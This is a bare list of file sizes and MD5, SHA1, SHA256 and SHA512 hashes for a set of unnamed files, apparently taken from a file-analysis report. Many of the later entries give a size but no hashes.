SHA512068a16360cc7594a8116f1c249be2ab0a8f2fa8c56de71856b758e77a81b2b5293c406335c4fec2766f54b3feed5fbb27eab623905aee9ec5987b44eafebef2b
-
Filesize
4.7MB
MD5d8fb710cfe42618916a314079aefe13a
SHA17b627cc0b56a7bf77f9a6226e678346f41af88f0
SHA2565934f18ce6910606eaa2cdb5df6d9567f154b8e9e5dc0b99d60ed7cd5e8342e6
SHA51241d5bde6a38a360855cb24d3dfc70c4c851612199b0d6efc0d55d039d830c6a11902e65e07dc66cc038e0b0fe0c5c416bf1b1b042cd46d829a475aff2312a739
-
Filesize
43.8MB
MD554d7d4cd24e7634742c7a19078c9a89b
SHA1a02bab5622e4cb64f91359d7b55603003870340d
SHA256337f47fa610003e10e5581cf1a7e8279d7cf787f4e9fed6e59f3d1aad1ffafe1
SHA512d68f934b3b44641a35f91bb9ac73c28e49e394bbfc395b6321dee2fd0bdb70b36f14e805b87f602367c0149f42ec286a22af148f78988f0a053fecbd08b2543f
-
Filesize
1.1MB
MD5656173fdb36a80ea3a0ea9b330a64580
SHA12645b31ceabcaa3db83a10761f267e43ac6b1031
SHA2563b766ff82e6b0fc242a38c16e1f8a36bf6bbfff096c8045aa3d66e5f02b4d328
SHA512ab1dab4126084895e90d2438769089fb4474fa503ddba142947d369412f847c5c9732aff92f71f2033c47f64373dac2489b1836874499bd9144134712d8e6614
-
Filesize
2.0MB
MD51301a5c6f5ca6d1c41bd77e73aba52df
SHA10d9b25ea0b1a8d79bec4346b978ff0cd815cbbee
SHA2562ec593cc1def55ad345fc555108e51f01dac1766cb3a2d1aeb284ec3fb4c1b1c
SHA512936f6355934a01275c602584d86de1772f498a8c272e79780f8daf42b20f289367b6cdfece6e106de93de133ee0c5e8a2021201ec2f6cb0820d30b175a6986fe
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
8.1MB
MD559c87d13e5ecf960d47f3371db110908
SHA140233715eab1da0044b2f14a7cf393ddcb08b37b
SHA256aeb08f9dbd1a383366a30a46da2db9bb15caf16753198e8da940ced5d9a6b353
SHA5125c53d957c0587c98133bed216e7a6758ec0c7891a186fc2dc9ec9503e8cd9114ebc1c56bf233c6c92954ff3f4ec979699272a089e2089d135fa46c48d7d5cc95
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
364KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
952KB
-
Filesize
952KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
304KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
72KB
-
Filesize
32KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB